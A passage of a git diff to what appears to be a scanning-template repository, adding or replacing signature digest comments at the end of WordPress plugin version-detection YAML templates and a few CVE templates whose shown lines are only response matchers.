http/technologies/wordpress/plugins/wp-smushit.yaml | 2 ++ http/technologies/wordpress/plugins/wp-statistics.yaml | 2 ++ http/technologies/wordpress/plugins/wp-super-cache.yaml | 2 ++ http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 2 ++ http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 2 ++ http/technologies/wordpress/plugins/wpforms-lite.yaml | 2 ++ http/technologies/wordpress/plugins/wps-hide-login.yaml | 2 ++ http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 2 ++ .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 2 ++ 203 files changed, 403 insertions(+), 6 deletions(-) diff --git a/http/cves/2018/CVE-2018-7192.yaml b/http/cves/2018/CVE-2018-7192.yaml index af8ae31fcf..fa8d5751f0 100644 --- a/http/cves/2018/CVE-2018-7192.yaml +++ b/http/cves/2018/CVE-2018-7192.yaml @@ -72,5 +72,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and - -# digest: 4a0a00473045022100ba3aa3f4e0706097823ef907be4150e829364bef1658b1b0d5d62e175c417b8002203730cb20901cf3edd8e75375f623df02b065651a4c40b20d38d1ce40832dc67e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ec71e04f5587f9555c3a6455856fe0707c97016bf732bb2d32d3820c3c849990220474b01d82393e9e7e06e06b45821eebf52976c16c985bafab24e31a373fe90e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7193.yaml b/http/cves/2018/CVE-2018-7193.yaml index 38c48a90e9..c8fc9f2cd1 100644 --- a/http/cves/2018/CVE-2018-7193.yaml +++ b/http/cves/2018/CVE-2018-7193.yaml @@ -72,5 +72,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and - -# digest: 490a0046304402202de9db56da192cac0445aff761771d11b4a5f8fa2bddaa4bf787e6a845c0910502200688dcd768baced7323f738ef3bfa984bedc1550e0be285790188fedb6a822ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cbec67f214c6e316f3cd571c048efe4b5fa30471027dd468a2389f12c0f5d6300220723b75f7d4347a6bd1b0a8d70329eee12753226569f662899a1c2fb853b4a7a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1318.yaml b/http/cves/2023/CVE-2023-1318.yaml index ebf6cabe01..60f6ca6475 100644 --- a/http/cves/2023/CVE-2023-1318.yaml +++ b/http/cves/2023/CVE-2023-1318.yaml @@ -81,5 +81,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 200' condition: and - -# digest: 4b0a0048304602210098728f63a0d4a44dbbf9c481c4f96488f4e31c67061eead68abf2265659bc656022100e064e98e4429b080939f0b40b6017bc6b45c0cc6b1d0c3b81bfdaf0d5c93ea5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083866ca1940448c63ff84d38902496a01263ad7d0eda3ea2d1b63c1fcf617724022100c41e3708e1f0eb14276a6f0a5e77a024700eece54fbe5d8418892d3e7f34c3d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32735.yaml b/http/cves/2024/CVE-2024-32735.yaml index 22b1c35d95..0f8c5f4075 100644 --- a/http/cves/2024/CVE-2024-32735.yaml +++ b/http/cves/2024/CVE-2024-32735.yaml @@ -48,3 +48,5 @@ http: - type: status status: - 200 + +# digest: 4a0a00473045022074c23f569a7ddf077df815873a85b19ab72358ef948d53786834fc878b15029c022100c8ef22e47a987b8538383aa10b93fc688968b7b97095b752b95894f2988d08c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..26175cc6af 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200da68207ca771ac47b0e46a39a33334a7abff2b63fb7ece48c4a37179d6a220802202f53da621e1f6cf7b45d0cd1e0d7f40f970053091be086557cbd3a25e715bed4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..1ed1d7cc93 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a98dfa7b9ce61a8937abdaa6965bd7d3dfe085b6d5907ed831d6e6882e964657022058009c678e5cdb0258590c127b45d496b1a3b38400191bb5267d795a0e5b5793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..3cf8093bd9 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022032a8894326ab979f0c70db061d70fb1e29a27467ecb91080e64647698780ff54022100a8202c650e636a553a57be065107672adeac3e2da2faa6087cd16fad877ffb7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 1f02455962..600b098f52 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c0ed36ab2928d9047c5fe63b60ebf35182ed7a71bcbb4ee0305dc037fdefe630022042c936170b877de666502eb2cc4eda27d00f1c19518a58e1b2ea3eb9cb843b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..dabe5c0766 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a43b74463b1d725f8b1f68706574dac1fff47fe5f63e8e17e2027370d193d0980221008182d5b8272e4f970b088b6e34764d6818a05c53ecaa8f32a389999b38c6dff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..55d9413f58 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022014d908ad1ed373f55288761f804d3f18c75ce4864b27e70bfb2074b98f29483e022100d44b61e0d4c9638a4adb772370f2def8754cf11f53090f7879a9ea33d4ce18ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..0e8d812f31 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a02b7dd01eaa70c19b9b933d1f892abb41e2e19ee6e9bce4249d3a1f46ee56db022100c41b9136b7228ba8c6b562bfe8ce92f90d54a857abcdc9ab9ada89afd67557c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..a3372a7307 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022029e5dd7b659e77039a56766c51e9dbe1aac70d9799c33da06a0b8f25eab4d6d1022100b37da760b78d129b97f4eea78abff048f962e7cf14b3792cd0fe66250b5081e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..960004fe91 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022075407a52ee0ef5123a7a5498e1d19ca2b15360f608bf6936d93521a7b6b31bb3022100b1d1a3d4a915748017200018fc6a9e360cace53474da4c35ddf37f3a549bef03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..c84df786a7 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022012511801443f28fec24be44db1b89f4b1392553251c792d041031cf1c24b47ed022100d550ce5c07edc95cf7f9d95bf8b4bdce479130b6abe91932d927fc03fd7fd23b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..1c33433d3f 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022063053fbc4b2c3c082bb8eae26e2099dad12d536f492e54ac7dba756639a1c81402202fb03d6bdf69230dd8561a7e5d323ef789545eb0c1121323e7463b5582ef6442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..c3f679d833 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200d1ded23907de031d2169733a691e96ba786c42b9e43375847c63afa187b196f022100ba843b1052d602bcb83ec5f2c96db20567c91795b74465bf582a48dad0a82807:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..81adf06fba 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100be80834d54cd2183af2bbcd991bd6f945a6d19c8ec24d7ba67c2fa07de39151202203b3b87ec885cfef6183429c2b18fdab7b3f7b015761b1d4287d2fe2c323ae0bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..6bda0c1a57 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100aaaa1a1e08cd5b472875826efda03d21529e1b24d26130591e0fdc89f2e83c5c022100838796c7e1bf4a287aa91757d9a8beb39787ab5dad4dddd26b547cda7ef106f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..946f460f7c 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200b497bd58ac49f538125008aed98c2b8efaf254a01f796de952e2d105c7d1b75022006585551a0e574df103be548fb6b62428e5f0306276e3a1f51c657198f8b0b0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..a70759ab7d 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100832356b856189660ae8fff9ddedd1c3e79b1234ba99b9707b778d389249b734b02204a85058fd981bd62cfe090c94a5451551b5b63d8dbd0ca629ffc90473bb358c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..b374d462a4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220438394f3b94bdfcb77c6f465102ae8eabd3eb94d921ba2f1a7f6c67ea29dc58a0220597a6854d142740b3790b58689605b5d64b4de118cc0c1a1f27cffba8d6874a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..485818301c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f9a3b04bf2c7165d62997dbc668bae1f55e14914671b2f6a3d2b2e7f1e7da6c8022069989b07dab9c19b6697367299303046a9838e5ef3d44bb907566739abad4e4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f8691caf0a..c2edb8a2a4 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f3277faf5519dddee57255fbe57c4b5b2d129b7df6d8d5407b6318cbb5850e710220262be88e562f013b60d0ff7781b5416a59c2ee320f58c29350d6120404e8e4fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..e55bb43e01 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a220fa8b1405e1a4dd9ef77fdb96326b2383fd4003093b5dfb380f285bcb255502210090265cb3197d62a99ee09d9ec29b7968efe054f687addf0901925c95c7027ef3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..299fdd4347 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022039acaa576687db76236bfc5bec017201c0f2253acaa198849a2c48982bb9e1aa022100a99d75a7b7fa2b225c02f464bec87df4da8cdb8139316437935db06b4ec0501e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..1a2de778c5 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220698e59e65830612e910c92751365a1500520945ebace64f7a627b4f8c89e700d02201de4594103adb7e4e643df18bc1495c976e7f2512263d7f4cd1fa2dd9d44b66d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..cc4e308932 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202ce198bd8f5ad746a0e89e8b47cb0e4ea5c62bb4b63ce711bb8f5b0d25b1f185022100e7a9d36da46eb8deb7efa28431a10255391a7afa9fb62939a34cf77d5c92a6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..b0e3bd24be 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200f8d1c5a03ac21d21b3a857d3ea2ee3588b4f452c14a8a67fd6d4812d7125281022016149251f8a4d8ea8df09c748ed7608aa8b593cafde5557ca03fe2c31345454f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..6eacb3c102 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200bdafcab38ec934cce3116b8811980f828d58da9f8cd6e4a8ab538ac53385e38022100e4381097dcf715b144da5c0943cdb7a573ccc0ce13733ad1f7c14f16c9455c83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..290febd7f3 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204a5ddc29acdcef06cbfe40450fd20ba74081a5a39de9719beb63627981326967022100877e412c77a764a42ce2ccc2bb0fcf18f16c5e49178a33ea9cfeaa34cce84b22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..b160469284 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022056c43bb108131227f5895dacc450f592878d3f3f7969b43b49f9404df9890bfe02207286e2e7a56b32596653e8111a12fa523933135fbc2bc3afc25ca40cbcfc6334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..57b63e183e 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207726b162c7f8735234092d7169ace7e8095bdb35ffc17734c81fe8702fccecb1022012e1919c4e9b54f2abee5b3e069b0b26d0a7cac545347cb7812698c8b61d2401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..009f991e73 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022063f89e8d33f47ef5a2b4c67639a6fb0b3db64a316a859fb90a04a8fd0d4111f402207c98f12fc808659d5a9516dbee1a49ca78d8a0e4cc1f7bb8d4de0f7b0b3f7a50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index e13909fff3..a1d7300e20 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204145c8e72b4104ce799cfbb068dbe4f66cc4cc33a48f7a789de80af1bbc2868f0220266775a01da3e9a8616594ceeea0c5e7035dc94a1e372f7cc2b3c851e5de52d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..bb1ce000c4 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d5d002af1a70a8c8bac97199d5283579c2ed63124d7cd7514d8a3b4abc62ef180221009df4c9a487564ffd899a8575bfdbb687db9a531d41b5b5433999a7f6cc7a6400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..e85ba45625 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f18a57d964a05ed72cbbbac45602a17aeb2e0d82f3c0a5618846a7060a2cc55c022100e12c045d19c602cae9cd8c32975fcc33a517313e29fa9da5fc7e35be177270e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..3a8187ed10 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202e3c06c6767dc59b7babb6cd56521578357d3b7c6012f988f56c00a5beff177702206a1befc9137c81caa289d489a9e36061a1db3e5fa9a938db6cabf039df72e4b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..ac13fb5d28 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100867e2aeda75a8e857a61b7f0be26eeb43487d28698b3912bb32d0ab524f2462e022100a08d8c10ef373cdfe2d7d41b94900fa7d73c32cf5a9c9a2a945baf7c4c69f14b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..cde30ba89a 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220237f9215bea3a91f60d903a858b2ad5748c4dadec5c78b042cac9fdfdc4d6b0502204ba9b7d90c114f6b81f6fdf229a6f2695b410dacd3a3c0daee49e864e43ec96d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..c47878e498 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a47adaa9c631becce5d08537f9e7c2296925d381ae08c5cf4599d3c1920bfede022006c8d3faf213f01a829ca39f1a6e9d982c2f673b84656ee20770c9f3d2723c14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..0be0434c67 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220342a6525844436a0bddaf4cb9c8e53117e7f9e8b7598a1bc4e1f384e6543597a02204a7a71ab4743ca766338369e09cd6344950875f51266055516eadcb9a6c67510:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index dafbd25c9e..34a0001f14 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200e4a41ae6140a8a952a8c6cfed23bb266d5e30428d69295febb5494b1ead0221022100da7d652acb7486bc0e4be73bf1d83be3428180cc35ce225ad9e4d0c788b1b74a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..37d84c8842 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022073670af43335ac5bac56c3bab15d880561d16b5ec29eef7c3ce7b5de01b0bc6e02204465961388589279579916b3bdc42a23f42959db6c7e969e11cf143e434121e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..aeef804879 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206db4b33b04a13533039c21c7bc7bb23cd3102d80b96b0f5d0c194289c3248ba402200d415ba75571bd736e306da0b7ab1f47b426a578a434b69445256c45836251a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..84f5b60d3d 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206e04862a7ebabaa9d9ad5d05221148776a8982c797705647698aa3c3574562e002207e39423423e800815c05aeaa25d3a2430b45ab623b8f4afac57ae388f9d436e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml 